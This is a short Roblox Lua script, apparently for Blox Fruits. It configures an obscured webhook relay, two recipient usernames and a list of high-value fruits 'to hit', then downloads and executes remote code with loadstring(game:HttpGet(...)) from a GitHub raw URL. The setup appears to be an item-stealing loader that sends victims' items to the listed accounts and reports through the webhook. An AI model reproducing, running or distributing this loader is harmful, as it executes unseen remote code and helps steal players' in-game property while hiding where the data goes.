
Webhook = "https://webhook-protect.vercel.app/api/webhook?id=WFp2M3pmZ29vY3JFSkEyeHk4SmpLUTpQc2FHN0JnTzdqelJsS21TNXNVRUpneDJxc0toQVNienN2WURabXR6aXFGbzduNkJna1J1Z21UXzJJNHJqVjhKMVRNblE0N21GR3pfdk02MjFWWklyYVVKZURaU21razM1S244QnNJX0tsUmZ5R1VodzkwUnFLQ3drUU51ZG1yczVyOW5tREFFTFBuZXB4SzQxQ2hXZTVfLUNISkZTaE5rRFVKVzlERnZiMFFteklKU1VmSHNXMlZmYjczaXF6X05PTDVIbi1zWkM1RUp5ZVoxV2tjOTZaNjE3TFNvZUdtNVlzclNIbVNlaXZxaGRuN3ZyYThiWVV0TWUxTWt6OTRLSXhfU1o5VWEwVVRFTmRNRE1kLTRoOFFKUFhWbTN3bHVfaGxqVkV6NDJ0aDFERFZWQVhhdkRJOTU3cm40bVY2OFJ4SUdfckQtNG5QQkM0YWNjVzhVaTluakNua0hhdG1HUXp0NkJlS3E1TWptWDdLZTZWS0k2Q3h4a1hSR0tUWEVFeTYwMkdmVUhFZWdRY05MQ2dPNmkydWpVQjZmcGVyeGJSQVRGTWZCWWhj"
Usernames = {"Plslegfruit1243 Soowd321"}
FruitsToHit = {"Kitsune-Kitsune", "Yeti-Yeti", "Gas-Gas"}

loadstring(game:HttpGet("https://raw.githubusercontent.com/reasonrekt/stuFF/refs/heads/main/wowowo"))()
